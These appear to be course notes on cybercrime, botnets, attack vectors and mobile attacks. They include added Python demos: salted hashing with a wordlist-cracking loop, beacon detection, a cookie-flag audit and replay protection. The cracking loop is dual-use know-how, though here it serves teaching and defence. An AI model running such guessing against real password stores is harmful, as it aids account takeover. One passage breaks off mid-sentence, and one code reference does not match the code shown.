
CYBER SECURITY &FORENSICS

UNIT-I

Cybercrime, or computer-oriented crime, is crime that involves a computer
and a network. The computer may have been used to commit the crime, or it
may be the target. Cybercrime is the use of a computer as a weapon for
committing offences such as fraud, identity theft, or breaches of privacy.
Cybercrime, especially through the Internet, has grown in importance as the
computer has become central to every field, including commerce, entertainment
and government. Cybercrime can endanger a person's or a nation's security and
financial health. It covers a wide range of activities, but these can
generally be divided into two categories:
1. Crimes that target computer networks or devices. These involve threats
such as malware (viruses, worms, trojans), exploitation of software bugs, and
denial-of-service (DoS) attacks.
2. Crimes that use computer networks to commit other criminal activities,
such as cyber stalking, financial fraud or identity theft.

Classification of Cyber Crime:


1. Cyber Terrorism –
Cyber terrorism is the use of computers and the Internet to carry out, or
threaten, acts intended to cause physical harm, loss of life, or severe
disruption of essential services (for example power, water or transport
control systems) for political or ideological ends. In general, cyber
terrorism can be defined as an act of terrorism committed through the use of
cyberspace or computer resources.

2. Cyber Extortion –
Cyber extortion occurs when a website, e-mail server or computer system is
subjected to, or threatened with, repeated denial-of-service or other attacks
by malicious hackers, who demand payment in return for stopping the attacks or
for "protection". Ransomware, which encrypts the victim's data and demands
payment for the decryption key, is the most common form today.

3. Cyber Warfare –
Cyber warfare is the use or targeting of computers, online control systems and
networks in a battlespace or warfare context. It involves both offensive and
defensive operations concerning the threat of cyber attacks, espionage and
sabotage.

4. Internet Fraud –
Internet fraud is fraud or deceit that makes use of the Internet, for example
by hiding information or providing false information in order to deceive
victims out of money or property. Internet fraud is not considered a single,
distinct crime but covers a range of illegal and illicit actions committed in
cyberspace.

5. Cyber Stalking –
Cyber stalking is online harassment in which the victim is subjected to a
barrage of online messages and e-mails. The stalker often knows the victim and
uses the Internet instead of, or in addition to, offline stalking; if the
online harassment does not have the desired effect, the stalker may escalate
to offline stalking as well, to make the victim's life more miserable.

Challenges of Cyber Crime:

1. People are unaware of their cyber rights-
Cybercrime frequently targets people who are unaware of the protections and
remedies that the law of their country gives them, and who therefore neither
recognise the offence nor know where to report it.

2. Anonymity-
Offenders hide behind fake identities, proxies, anonymising networks and
compromised third-party machines, often in another jurisdiction. Attribution
is slow and uncertain, and without it there is no one to prosecute.

3. Less numbers of case registered-
Every country faces cybercrime, and its rate is increasing, but a large share
of incidents is never reported to the police. This under-reporting hides the
true scale of the problem from both the public and the authorities.

4. Mostly committed by well educated people-
Committing a cybercrime is not within everyone's reach. The offender is often
technically skilled, knows how the targeted systems work and knows how to
cover their tracks, which makes investigation harder.

5. No harsh punishment-
Punishment for cybercrime is not uniformly severe. Serious offences such as
cyber terrorism attract harsh penalties, but many other offences carry light
sentences, and this weak deterrent encourages offenders.
Prevention of Cyber Crime:
Below are some points by means of which we can prevent cyber crime:
1. Use strong passwords –
Use a different username and password combination for each account. Weak
passwords are easily cracked by brute-force and rainbow-table attacks, so make
them long and unpredictable; length matters more than a forced mix of letters,
numbers and special characters. Rather than writing passwords down, use a
password manager, and enable multi-factor authentication wherever it is
offered.

2. Use trusted antivirus on devices –
Always use trustworthy, up-to-date antivirus software on mobile devices and
personal computers. This prevents many malware infections, although it will
not catch everything.

3. Keep social media private –
Restrict the visibility of your social media accounts to people you know, and
accept connection requests only from people you actually know.

4. Keep your device software updated –
Install operating system and application updates as soon as they are
available. Cybercriminals exploit known flaws in old versions, and a patch that
has been released is a flaw that attackers already know about.

5. Use a secure network –
Public Wi-Fi is vulnerable to eavesdropping. Avoid conducting financial or
corporate transactions on such networks.

6. Never open attachments in spam e-mails –
One of the most common ways a computer gets infected with malware is through
attachments in spam e-mails. Never open an attachment from a sender you do not
know or were not expecting.
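Why salting and a slow hash matter, shown in code. This Python example is added to these notes and is not part of the original text; the wordlist and passwords in it are constructed for the demonstration. It contrasts the unsalted single hash that rainbow tables target with salted PBKDF2 (the server-side defence), and shows that even the stronger scheme cannot save a password that appears in an attacker's wordlist, which is why the advice above is to make passwords long and unique.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# PBKDF2-HMAC-SHA256 cost. Kept modest so the demo runs quickly; production
# deployments use a far higher count (or Argon2/scrypt) to slow each guess.
ITERATIONS = 100_000

# Constructed stand-in for a leaked-password wordlist (not real data).
WORDLIST = ["123456", "password", "qwerty", "letmein", "Summer2024!"]


def unsalted_hash(password: str) -> bytes:
    """The weak scheme: one fast hash, no salt. Identical passwords give
    identical digests, so a precomputed table cracks every user at once."""
    return hashlib.sha256(password.encode()).digest()


def build_lookup_table(candidates) -> dict:
    """Precompute digest -> password for a wordlist: the idea behind a rainbow table."""
    return {unsalted_hash(p): p for p in candidates}


def crack_unsalted(digest: bytes, table: dict) -> Optional[str]:
    """Table lookup: constant cost per victim, no hashing needed at crack time."""
    return table.get(digest)


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest). A fresh 16-byte random salt per user means the
    same password stored twice looks different, so no table can be shared."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Recompute with the stored salt; constant-time compare so timing does
    not leak how many bytes of the digest matched."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)


def crack_salted(salt: bytes, digest: bytes, candidates) -> Optional[str]:
    """With a salt the attacker must run the full KDF per candidate per user;
    no precomputation helps. A weak password is still found, just slowly."""
    for p in candidates:
        if verify_password(p, salt, digest):
            return p
    return None


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print("unsalted 'letmein' cracked by table:", crack_unsalted(unsalted_hash("letmein"), table))
    salt, digest = hash_password("letmein")
    print("salted digest found in table:", crack_unsalted(digest, table))
    print("salted digest found by guessing:", crack_salted(salt, digest, WORDLIST))
```

The two `hash_password("letmein")` calls in the test below produce different stored values, which is the whole point of the salt; the guess loop still succeeds because "letmein" is in the wordlist, so the user-side advice (long, unique passwords) and the server-side advice (salted slow hashing) are both needed.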

Defining cybercrime
The U.S. Department of Justice (DOJ) divides cybercrime into three
categories:
1. crimes in which the computing device is the target -- for example, to
gain network access;
2. crimes in which the computer is used as a weapon -- for example, to
launch a denial-of-service (DoS) attack; and
3. crimes in which the computer is used as an accessory to a crime -- for
example, using a computer to store illegally obtained data.
Classification of Cyber Crime:
Cyber crimes can also be classified into 4 major categories according to the
target:
(1) Cyber crime against Individual
(2) Cyber crime against Property
(3) Cyber crime against Organization
(4) Cyber crime against Society

Read more at: https://www.lawyersclubindia.com/articles/classification-of-cybercrimes--1484.asp


Cyber crime is taken very seriously by law enforcement. In the early years of
the cyber security world, the typical cyber criminal was a teenager or hobbyist
operating from a home computer, and attacks were mostly limited to pranks and
malicious mischief. Today the world of the cyber criminal is far more
dangerous: attackers are individuals or groups who exploit vulnerabilities for
personal or financial gain.
Types of Cyber Criminals:

1. Hackers: The term hacker may refer to anyone with technical skills, but it
typically refers to an individual who uses those skills to gain unauthorized
access to systems or networks in order to commit crimes. The intent behind the
intrusion determines whether the attacker is classed as a white, grey or black
hat. White hat attackers break into networks or computer systems to find
weaknesses so that the security of those systems can be improved; the owners of
the system give permission for the intrusion and receive the results of the
test. Black hat attackers, on the other hand, exploit any vulnerability for
illegal personal, financial or political gain. Grey hat attackers fall
somewhere between the two: they may find a vulnerability and report it to the
owners of the system if that suits their agenda.
 (a). White Hat Hackers – These hackers use their programming skills for
good and lawful purposes. They may perform penetration tests that attempt to
compromise networks in order to discover vulnerabilities, which are then
reported to the developers or owners to fix. They work within a written scope
and rules of engagement agreed with the organisation, use only the access it
grants, and test its security the way an external attacker would; some also
work on the defensive side as a blue team.
 (b). Gray Hat Hackers – These hackers break the rules and do things that
are arguably unethical, but not for personal gain or to cause harm. They may
disclose a vulnerability to the affected organization after having compromised
its network, and they may also exploit it.
 (c). Black Hat Hackers – These hackers are criminals who violate network
security for personal gain. They exploit vulnerabilities to compromise computer
systems, and they misuse whatever information or data their unauthorized
access yields.
2. Organized Hackers: These criminals include organized crime groups,
hacktivists, terrorists and state-sponsored hackers. Criminal groups are
typically teams of skilled criminals focused on control, power and wealth. They
are highly sophisticated and organized, and may even offer crime as a service.
These attackers are usually well prepared and well funded.
3. Internet stalkers: Internet stalkers are people who maliciously monitor the
web activity of their victims to acquire personal data. This type of cybercrime
is conducted through social networking platforms and through malware that can
track an individual's computer activity with little or no detection.
4. Disgruntled Employees: Disgruntled employees can become attackers with a
particular motive and commit cybercrimes against their employer. In the past
their main option was to strike or resign; now that so much work runs on
computers and automated processes, a disgruntled employee can do far more
damage to the employer and the organization. Because insiders already hold
legitimate access and know where the valuable data is, such attacks are hard
to detect and can bring a whole system down.

What is Cyberstalking?
Cyberstalking is a type of cybercrime that uses the internet and technology to harass or
stalk a person. It can be considered an extension of cyberbullying and in-person
stalking. However, it takes the form of text messages, e-mails, social media posts, and
other mediums and is often persistent, deliberate, and methodical.

Cyberstalking often starts with seemingly harmless interactions that go on to become
systematic in an annoying or frightening manner. Some even find the initial stage of
cyberstalking amusing and harmless, but it stops being fun when the interactions do
not end even after the recipient has expressed their displeasure and asked for the
interaction to stop.

Cyberstalking Examples

Cyberstalkers use a variety of tactics and techniques to humiliate, harass, control, and
intimidate their victims. Many cyberstalkers are technologically savvy as well as creative
in their ways. Here are some examples of how Cyberstalking might take place:

 Posting offensive, suggestive, or rude comments online
 Sending threatening, lewd, or offensive emails or messages to the victim
 Joining the same groups and forums as the victim
 Releasing the victim's confidential information online
 Tracking all online movements of the victim through tracking devices
 Using technology for blackmailing or threatening the victim
 Excessively tagging the victim in irrelevant posts
 Engaging with all online posts made by the victim

Types of Cyberstalking
Let us explore the various kinds of Cyberstalking that are prevalent:

Catfishing

The creation of fake profiles or copying of existing ones on social media to approach
victims.

Monitoring check-ins on social media

Keeping an eye on the activities of a victim on social media to accurately gauge their
behavior pattern.

Spying via Google Maps and Google Street View

Using Street View to spy on a victim and find their location from posts or photos on
social media.

Hijacking webcam

Webcams can be hijacked by introducing malware-infected files into the victim's
computer.

CYBERCAFE AND CYBER CRIME

A recent survey conducted in one of the metropolitan cities in India revealed the following
facts:
 Pirated software such as operating systems, browsers and office automation
software (e.g., Microsoft Office) is installed on all the computers.
 Antivirus software is not updated to the latest patch and/or antivirus
signatures.
 Several cybercafes had installed the software "Deep Freeze" to protect the
computers from malware. (Deep Freeze restores the disk to a saved image on every
reboot, which wipes malware written to disk, but it does nothing against a
keylogger or other malware running during the current session.)
 No annual maintenance contract (AMC) is in place for servicing the
computers; hence the hard disks are not formatted unless a computer is down. Not
having an AMC is a risk from a cybercrime perspective because a cybercriminal can
install malicious code on a computer and conduct criminal activities from it
without any interruption.
 Pornographic websites and other similar websites with indecent content are not
blocked.
 Cybercafe owners have very little awareness of IT security and IT governance.
 Government/ISPs/State Police (cyber cell wing) do not seem to provide IT
governance guidelines to cybercafe owners.
 Neither the cybercafe association nor the State Police (cyber cell wing) seem to
conduct periodic visits to cybercafes. One cybercafe owner interviewed expressed the
view that the police will not visit a cybercafe unless criminal activity has been
registered by filing a First Information Report (FIR). Cybercafe owners feel that
the police have very little knowledge of the technical aspects involved in
cybercrime and/or little conceptual understanding of IT security.

There are thousands of cybercafes across India. In the event that a central agency
takes up the responsibility for monitoring cyber
BOTNETS

A botnet (short for "robot network") is a network of computers infected
by malware that are under the control of a single attacking party,
known as the "bot-herder". Each individual machine under the control
of the bot-herder is known as a bot.

How Does a Botnet Work?

Below are the steps that are carried out to build a botnet and use it in an attack:

 Prepping the Botnet Army: The first step in creating a botnet is to infect as many connected
devices as possible, to ensure that there are enough bots to carry out the attack. The botnet uses
the computing power and bandwidth of the infected devices for tasks that remain hidden from the
device owners. A single machine contributes little, so the bot-herder combines thousands or millions
of devices to carry out large-scale attacks. Bots are recruited by exploiting security gaps in
software or websites, through phishing e-mails, or by bundling the bot malware into a trojan horse.

 Establishing the connection: Once a device is compromised, the malware connects it back to the
attacker's command and control (C&C) infrastructure. Every infected device joins the botnet this way,
and the bots then sit idle, ready to execute whatever the bot herder commands.

 Launching the attack: Once infected, a bot can be commanded to perform operations such as
gathering and stealing user data, reading and writing system data, monitoring user activity, taking
part in DDoS attacks, sending spam, launching brute-force attacks, mining cryptocurrency, and so on.

Fig: Working of a Botnet

As the figure shows, the bot herder initiates the attack by infecting several devices with
malicious code; those devices make up the botnet and carry out the final attack. Because the attack
traffic comes from the bots rather than from the herder's own machine, tracing an attack back to
the bot herder is difficult.
Botnet Architecture

Botnet architecture has evolved over time to work better and to reduce the chance of being
traced. As seen previously, once the desired number of devices has been infected, the botmaster
(bot herder) takes control of the bots using one of two approaches: a centralised client-server
model, or a decentralised peer-to-peer model.

 Client-Server Model

Fig: Client-server model

The client-server model is the traditional model. A command and control (C&C) server issues
instructions to the bots over a protocol such as IRC (Internet Relay Chat) or HTTP; in the IRC
case the bots join a channel and commands posted there are pushed to every bot.

Before an attack, the bots are typically programmed to remain dormant and await commands from
the C&C server. When the bot herder issues a command to the server, it is relayed to the clients;
the clients run the command and report back to the bot herder with the results. The central
server is also this model's weakness: if defenders take the C&C server down or block its address,
the herder loses control of the whole botnet.
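Detecting the dormant-then-poll behaviour described above from the defender's side. This Python example is added to these notes (it is not from the original text or from any product): it reads constructed connection-log lines, groups them by source, destination and port, and flags flows whose connection intervals are suspiciously regular, the signature of a bot checking in with its C&C server on a timer. The log format and the thresholds (min_connections, max_cv) are assumptions that a real deployment would adapt to its own firewall or proxy logs.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed outbound-connection log ("timestamp src dst port"), not real traffic.
# 10.0.0.7 contacts 203.0.113.9 roughly every 60 s with a second or two of jitter,
# like a bot polling its C&C server; the 10.0.0.5 rows are irregular browsing.
SAMPLE_LOG = """\
2024-03-01T09:00:00 10.0.0.7 203.0.113.9 443
2024-03-01T09:00:13 10.0.0.5 198.51.100.20 443
2024-03-01T09:01:01 10.0.0.7 203.0.113.9 443
2024-03-01T09:01:45 10.0.0.5 198.51.100.21 80
2024-03-01T09:02:00 10.0.0.7 203.0.113.9 443
2024-03-01T09:02:59 10.0.0.7 203.0.113.9 443
2024-03-01T09:03:20 10.0.0.5 198.51.100.20 443
2024-03-01T09:04:01 10.0.0.7 203.0.113.9 443
2024-03-01T09:05:00 10.0.0.7 203.0.113.9 443
2024-03-01T09:05:50 10.0.0.5 198.51.100.22 443
2024-03-01T09:06:00 10.0.0.7 203.0.113.9 443
"""


def parse_log(text):
    """Yield (timestamp, src, dst, port) tuples from the simple log format above."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        yield datetime.fromisoformat(ts), src, dst, int(port)


def find_beacons(text, min_connections=5, max_cv=0.15):
    """Flag (src, dst, port) flows whose inter-connection intervals are unusually
    regular. cv = population stdev / mean of the intervals: human-driven traffic
    is bursty (high cv), a sleep-then-poll loop is not (cv near zero)."""
    flows = defaultdict(list)
    for ts, src, dst, port in parse_log(text):
        flows[(src, dst, port)].append(ts)

    beacons = []
    for key, times in flows.items():
        if len(times) < min_connections:      # too few samples to judge regularity
            continue
        times.sort()
        intervals = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(intervals)
        if mean == 0:                         # duplicate timestamps, not a beacon
            continue
        cv = statistics.pstdev(intervals) / mean
        if cv <= max_cv:
            beacons.append({
                "flow": key,
                "count": len(times),
                "mean_interval_s": round(mean, 1),
                "cv": round(cv, 3),
            })
    return beacons


if __name__ == "__main__":
    for b in find_beacons(SAMPLE_LOG):
        print(f"possible C&C beacon: {b['flow']} every ~{b['mean_interval_s']}s "
              f"(n={b['count']}, cv={b['cv']})")
```

A real bot adds random jitter to its sleep interval precisely to raise the cv; the counter-measure is to look over longer windows and at other features (constant request size, a user-agent no browser uses) rather than interval regularity alone.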

ATTACK VECTOR:
An attack vector is a pathway or method used by a hacker to
illegally access a network or computer in an attempt to exploit
system vulnerabilities. Hackers use numerous attack vectors to
launch attacks that take advantage of system weaknesses, cause
a data breach, or steal login credentials.

What is an attack vector?

An attack vector, or threat vector, is a way for attackers to enter a network or system.
Common attack vectors include social engineering attacks, credential theft, vulnerability
exploits, and insufficient protection against insider threats. A major part of information
security is closing off attack vectors whenever possible.

Suppose a security firm is tasked with guarding a rare painting that hangs in a museum.
There are a number of ways that a thief could enter and exit the museum — front doors,
back doors, elevators, and windows. A thief could enter the museum in some other way
too, perhaps by posing as a member of the museum's staff. All of these methods
represent attack vectors, and the security firm may try to eliminate them by placing
security guards at all doors, putting locks on windows, and regularly screening museum
staff to confirm their identity.
Similarly, digital systems all have areas attackers can use as entry points. Because
modern computing systems and application environments are so complex, closing off all
attack vectors is typically not possible. But strong security practices and safeguards can
eliminate most attack vectors, making it far more difficult for attackers to find and use
them.

What are some of the most common attack vectors?
Phishing: Phishing involves stealing data, such as a user's password, that an attacker
can use to break into a network. Attackers gain access to this data by tricking the victim
into revealing it. Phishing remains one of the most commonly used attack vectors —
many ransomware attacks, for instance, start with a phishing campaign against the
victim organization.

Email attachments: One of the most common attack vectors, email attachments can
contain malicious code that executes after a user opens the file. In recent years, multiple
major ransomware attacks have used this threat vector, including Ryuk attacks.

Account takeover: Attackers can use a number of different methods to take over a
legitimate user's account. They can steal a user's credentials (username and password)
via phishing attack, brute force attack, or purchasing them on the underground market.
Attackers can also try to intercept and use a session cookie to impersonate the user to a
web application.

Lack of encryption: Unencrypted data can be viewed by anyone who has access to it. It
can be intercepted in transit between networks, as in an on-path attack, or simply
viewed inadvertently by an intermediary along the network path.
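A check for the session-cookie interception risk raised under account takeover and lack of encryption. This Python example is added to the notes (it is not from the original page) and audits Set-Cookie headers: a session cookie without the Secure flag is also sent over plaintext HTTP, where an on-path attacker can capture and replay it; one without HttpOnly can be read by script injected into the page; and one without a Lax or Strict SameSite value is attached to cross-site requests. The sample headers and the cookie-name heuristic (SESSION_NAME_HINTS) are constructed assumptions for the demonstration.

```python
# Constructed Set-Cookie headers as a web application might emit them (not from any real site).
SAMPLE_HEADERS = [
    "sessionid=abc123; Path=/",                                  # weak: plaintext + JS-readable
    "sessionid=def456; Path=/; Secure; HttpOnly; SameSite=Lax",  # hardened
    "theme=dark; Path=/; Max-Age=31536000",                      # not a session cookie, ignored
    "auth_token=xyz; Secure; SameSite=None",                     # JS-readable, cross-site allowed
]

# Assumed name fragments that mark a cookie as carrying a session or credential.
SESSION_NAME_HINTS = ("session", "sess", "auth", "token", "sid")


def parse_set_cookie(header):
    """Split 'name=value; Attr; Attr=Val' into (name, {attr_lowercase: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, _value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return name.strip(), attrs


def looks_like_session_cookie(name):
    n = name.lower()
    return any(h in n for h in SESSION_NAME_HINTS)


def audit_set_cookie(header):
    """Return a list of findings for one Set-Cookie header; an empty list means OK.
    Non-session cookies are skipped: the flags matter for credentials, not themes."""
    name, attrs = parse_set_cookie(header)
    if not looks_like_session_cookie(name):
        return []
    findings = []
    if "secure" not in attrs:
        findings.append(f"{name}: missing Secure (sent over plaintext HTTP, can be sniffed and replayed)")
    if "httponly" not in attrs:
        findings.append(f"{name}: missing HttpOnly (readable by injected JavaScript)")
    samesite = attrs.get("samesite", "").lower()
    if samesite not in ("lax", "strict"):
        findings.append(f"{name}: SameSite is {samesite or 'not set'} (cookie attached to cross-site requests)")
    return findings


def audit_all(headers):
    """Map each header to its findings so a caller can report per cookie."""
    return {h: audit_set_cookie(h) for h in headers}


if __name__ == "__main__":
    for header, findings in audit_all(SAMPLE_HEADERS).items():
        print(header)
        for f in findings or ["  OK"]:
            print("  " + f)
```

The same three attributes can be checked against a live response with any HTTP client by reading every Set-Cookie header; the heuristic on cookie names is the part to adapt to the application being tested.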

Insider threats: An insider threat is when a known and trusted user accesses and
distributes confidential data, or enables an attacker to do the same. Such occurrences
can be either intentional or accidental on the part of the user. External attackers can try
to create insider threats by contacting insiders directly and asking, bribing, tricking, or
threatening them into providing access. Sometimes malicious insiders act of their own
accord, out of dissatisfaction with their organization or for some other reason.

Vulnerability exploits: A vulnerability is a flaw in software or hardware — think of it as
being like a lock that does not work properly, enabling a thief who knows where the
faulty lock is to enter a secured building. When an attacker successfully uses a
vulnerability to enter a system, this is called a vulnerability "exploit." Applying the
software or hardware vendor's updates can fix most vulnerabilities. But some
vulnerabilities are "zero-day" vulnerabilities: flaws that the vendor does not yet know
about, so no patch exists when they are first exploited.

Browser-based attacks: To display webpages, Internet browsers load and execute code
they receive from remote servers. Attackers can inject malicious code into a website or
direct users to a fake website, tricking the browser into executing code that
downloads malware or otherwise compromises user devices. With cloud computing,
employees often access data and applications solely through their Internet browser,
making this threat vector of particular concern.

Application compromise: Instead of going after user accounts directly, an attacker may
aim to infect a trusted third-party application with malware. Or they could create a fake,
malicious application that users unknowingly download and install (a common attack
vector for mobile devices).

Open ports: A port is a virtual entryway into a device. Ports help computers and servers
associate network traffic with a given application or process. Ports that are not in use
should be closed. Attackers can send specially crafted messages to open ports to try to
compromise the system, just as a car thief might try opening doors to see if any are
unlocked.
How can an organization secure its attack vectors?
There is no way to eliminate attack vectors altogether. But these approaches can help
stop both internal and external attacks.

 Good security practices: Many attacks succeed due to user error: users fall for
phishing attacks, open malicious email attachments, or provide access to an
unauthorized person. Training users to avoid these errors goes a long way toward
reducing several major attack vectors.

 Encryption: Encrypting data in transit prevents it from being exposed to any
intermediary parties.

 Browser isolation: This technology moves the process of loading and executing
untrusted code to a location outside of an organization's secured network. Browser
isolation can even help eliminate the threat of zero-day attacks, at least in the
browser.

 Patching vulnerabilities: A large number of attacks occur because an organization
has not patched a vulnerability. Patching vulnerabilities and regularly updating
software and hardware vastly reduces the chances of a successful vulnerability
exploit.

 Secure access service edge (SASE): As reliance on the cloud has changed corporate
computing models, many organizations find their networking and security models
need to change as well. Secure access service edge (SASE) is one method of
integrating networking and security.

PROLIFERATION OF MOBILE AND WIRELESS DEVICES

Proliferation (Growth) of Mobile and Wireless Devices

 A few years ago, the choice was between a wireless phone and a
simple PDA. Now buyers can choose between high-end PDAs with integrated
wireless modems and small phones with wireless Web-browsing capabilities.
Security challenges posed by mobile devices
Mobile devices carry real security risks. Almost every function of a modern
phone or tablet connects to or through the Internet, so the device is exposed
to all the threats that exist there, and its portability adds risks of its own.
While most of the threats are the same as those faced by the average laptop or
desktop user, some are unique to the mobile world. Mobile phone security
threats generally fall into four groups: application-based, web-based,
network-based and physical threats.
1. Application-based threats:
Most applications are downloaded, and they pose the most common risk for
mobile users; a device does little on its own, and it is the applications that
make it useful, so everyone installs apps. The risks range from bugs and basic
security weaknesses at the low end of the scale all the way to malicious apps
whose only purpose is to commit cybercrime.
 Malware
 Spyware
 Privacy violations (apps that collect more data than they need)
 Zero-day vulnerabilities
2. Web-based threats:
Because we carry our devices everywhere and connect to the Internet as we go,
they face a number of unique web-based threats as well as the run-of-the-mill
threats of general Internet use.
 Phishing scams
 Social engineering
 Drive-by downloads
 Operating system flaws
3. Network-based threats:
A mobile device typically supports at least three network interfaces, usually
cellular, Wi-Fi and Bluetooth, and each one is a separate attack surface for
network-based attacks.
 Network exploits
 Wi-Fi sniffing
 Cross-platform attacks
 BYOD (bring your own device) risks, where personal devices carry corporate data
4. Physical threats:
Unlike a desktop sitting at your workstation, or even a laptop in your bag, a
mobile device is exposed to a number of everyday physical threats at any time.
 Loss/Theft:
Loss or theft is the most common physical threat to the security of your
mobile device. The device itself has value and can be sold on the secondary
market after all your information has been stolen and sold.
Attacks on mobile /cellphones

Wireless and mobile devices have become ubiquitous in today’s society, and
with this increased usage comes the potential for security threats. Wireless and
mobile device attacks are a growing concern for individuals, businesses, and
governments.
Below are some of the most common types of Wireless and Mobile Device
Attacks:
SMiShing: Smishing has become common now that smartphones are widely used.
SMiShing uses Short Message Service (SMS) to send fraudulent text messages or
links. The criminals then cheat the user, for example by calling; victims may
provide sensitive information such as credit card details, account details,
etc. Visiting a linked website might result in the user unknowingly
downloading malware that infects the device.
War driving: War driving is a technique used by attackers to find access
points wherever they may be. With the availability of free Wi-Fi connections,
they can drive around and collect a very large amount of information in a very
short period of time.
WEP attack: Wired Equivalent Privacy (WEP) is a security protocol that
attempted to provide a wireless local area network with the same level of
security as a wired LAN. Since physical security measures help to protect a
wired LAN, WEP attempts to provide similar protection for data transmitted over
a WLAN by using encryption. WEP uses a single key for encryption. There is no
provision for key management in Wired Equivalent Privacy, so the number of
people sharing the key continually grows. Since everyone uses the same key, a
criminal has access to a large amount of traffic for analytic attacks.
WPA attack: Wi-Fi Protected Access (WPA) and then WPA2 came out as improved
protocols to replace WEP. WPA2 does not have the same encryption problems,
because an attacker cannot recover the key by observing traffic. WPA2 is still
susceptible to attack because cyber criminals can analyze the packets going
between the access point and an authorized user.
Bluejacking: Bluejacking is the sending of unauthorized messages to another
Bluetooth device. Bluetooth is a high-speed but very short-range wireless
technology for exchanging data between desktop and mobile computers and other
devices.
Replay attacks: In a replay attack an attacker eavesdrops on information being
sent between a sender and a receiver. Once the attacker has captured the
information, he or she can intercept it and retransmit it later, which leads to
delays in data transmission. It is also known as a playback attack.
Bluesnarfing: This occurs when the attacker copies the victim's information
from the victim's device. An attacker can access information such as the
user's calendar, contact list, e-mail and text messages without leaving any
evidence of the attack.
RF Jamming: Wireless signals are susceptible to electromagnetic interference
and radio-frequency interference. Radio frequency (RF) jamming disrupts the
transmission of a satellite station so that the signal does not reach the
receiving station.
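The standard defence against the replay (playback) attack described above is to make every message unique and verifiable: a nonce plus a timestamp, bound to the message body by a MAC, so a captured copy cannot be accepted a second time. The following is an added example, not code from these notes; the message format, the 30-second window and the names make_message and Receiver are this example's own assumptions.

```python
"""
Replay protection between a sender and a receiver (added example).

Each message carries a random nonce and a timestamp, and the HMAC covers
nonce, timestamp and body together.  A replayed copy is rejected either
because its nonce was already seen or because its timestamp is stale.
"""
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple

MAX_SKEW_SECONDS = 30  # assumption: how old (or how far ahead) a message may be


def _mac(key: bytes, nonce: str, ts: int, body: str) -> str:
    # The '|' separator keeps the three fields from being re-split by an
    # attacker; none of the fields is allowed to contain '|'.
    msg = f"{nonce}|{ts}|{body}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def make_message(key: bytes, body: str, now: Optional[int] = None) -> Dict[str, object]:
    """Sender side: attach a fresh nonce, the current time and the MAC."""
    ts = int(time.time()) if now is None else now
    nonce = secrets.token_hex(16)  # 128 random bits, never reused in practice
    return {"nonce": nonce, "ts": ts, "body": body, "mac": _mac(key, nonce, ts, body)}


class Receiver:
    """Receiver side: verifies the MAC, then checks freshness and uniqueness."""

    def __init__(self, key: bytes) -> None:
        self.key = key
        self.seen: Dict[str, int] = {}  # nonce -> timestamp it arrived with

    def _prune(self, now: int) -> None:
        # Nonces older than the window can be forgotten: a message that old
        # is rejected by the timestamp check anyway, so memory stays bounded.
        expired = [n for n, ts in self.seen.items() if now - ts > MAX_SKEW_SECONDS]
        for n in expired:
            del self.seen[n]

    def accept(self, msg: Dict[str, object], now: Optional[int] = None) -> Tuple[bool, str]:
        now = int(time.time()) if now is None else now
        try:
            nonce = str(msg["nonce"])
            ts = int(msg["ts"])  # type: ignore[arg-type]
            body = str(msg["body"])
            mac = str(msg["mac"])
        except (KeyError, TypeError, ValueError):
            return False, "malformed"
        # 1. Authenticity first, compared in constant time.
        if not hmac.compare_digest(mac, _mac(self.key, nonce, ts, body)):
            return False, "bad mac"
        # 2. Freshness: outside the window means stale (or a clock far off).
        if abs(now - ts) > MAX_SKEW_SECONDS:
            return False, "stale"
        # 3. Uniqueness: the same nonce inside the window is a replay.
        self._prune(now)
        if nonce in self.seen:
            return False, "replay"
        self.seen[nonce] = ts
        return True, "ok"


if __name__ == "__main__":
    key = b"constructed-demo-key"  # constructed sample key, shared out of band
    rx = Receiver(key)
    m = make_message(key, "transfer 100", now=1000)
    print(rx.accept(m, now=1001))   # (True, 'ok')
    print(rx.accept(m, now=1005))   # (False, 'replay')  <- the captured copy
    print(rx.accept(m, now=1040))   # (False, 'stale')   <- replayed much later
```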
There are several types of attacks that target these devices, each with its
own advantages and disadvantages:
Wi-Fi Spoofing: Wi-Fi spoofing involves setting up a fake wireless access point
to trick users into connecting to it instead of the legitimate network. This attack
can be used to steal sensitive information such as usernames, passwords, and
credit card numbers. One advantage of this attack is that it is relatively easy to
carry out, and the attacker does not need sophisticated tools or skills. However,
it can be easily detected if users are aware of the legitimate network’s name
and other details.
Packet Sniffing: Packet sniffing involves intercepting and analyzing the data
packets that are transmitted over a wireless network. This attack can be used to
capture sensitive information such as email messages, instant messages, and
web traffic. One advantage of this attack is that it can be carried out without the
user’s knowledge. However, the attacker needs to be in close proximity to the
victim and must have the technical skills and tools to intercept and analyze the
data.
Bluejacking: Bluejacking involves sending unsolicited messages to Bluetooth-
enabled devices. This attack can be used to send spam, phishing messages, or
malware to the victim’s device. One advantage of this attack is that it does not
require a network connection, and the attacker can be located anywhere within
range of the victim’s Bluetooth signal. However, it requires the attacker to have
the victim’s Bluetooth device’s address and is limited to devices that have
Bluetooth capabilities.
SMS Spoofing: SMS spoofing involves sending text messages that appear to
come from a trusted source, such as a bank or a government agency. This
attack can be used to trick users into revealing sensitive information or
downloading malware. One advantage of this attack is that it can be carried out
without the user’s knowledge. However, it requires the attacker to have the
victim’s phone number, and it can be easily detected if users are aware of the
legitimate source of the message.
Malware: Malware is software designed to infect a device and steal or damage
data. Malware can be distributed through email attachments, software
downloads, or malicious websites. One advantage of this attack is that it can be
carried out remotely, without the attacker needing to be physically close to the
victim. However, it requires the attacker to have a way to deliver the malware to
the victim’s device, such as through a phishing email or a fake website.
